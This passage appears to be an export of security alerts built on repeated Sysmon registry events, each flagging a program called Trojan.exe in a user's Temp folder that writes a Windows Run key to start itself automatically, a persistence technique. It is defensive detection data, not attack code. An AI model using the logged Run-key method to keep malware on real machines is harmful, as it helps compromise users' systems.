HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:40.413"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:52.506",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:39.382 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:39.384943500Z"",""eventRecordID"":""1063"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:39.382\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:39.382"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:50.506",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:38.351 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:38.352192500Z"",""eventRecordID"":""1062"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:38.351\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:38.351"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:50.474",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:37.335 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:37.353405000Z"",""eventRecordID"":""1060"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:37.335\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:37.335"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:49.475",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:36.320 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:36.334800800Z"",""eventRecordID"":""1059"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:36.320\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:36.320"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:47.454",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:35.288 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:35.292420700Z"",""eventRecordID"":""1058"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:35.288\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:35.288"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:47.439",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:34.273 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:34.291567400Z"",""eventRecordID"":""1057"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:34.273\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:34.273"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:46.367",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:33.226 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:33.228233200Z"",""eventRecordID"":""1056"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:33.226\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:33.226"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:45.381",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:32.211 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:32.212816800Z"",""eventRecordID"":""1055"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:32.211\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:32.211"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:45.365",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:31.194 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:31.211125700Z"",""eventRecordID"":""1054"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:31.194\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:31.194"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:45.318",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:30.163 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:30.165499200Z"",""eventRecordID"":""1053"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:30.163\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:30.163"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:42.251",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:28.976 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:28.978561800Z"",""eventRecordID"":""1052"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:28.976\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 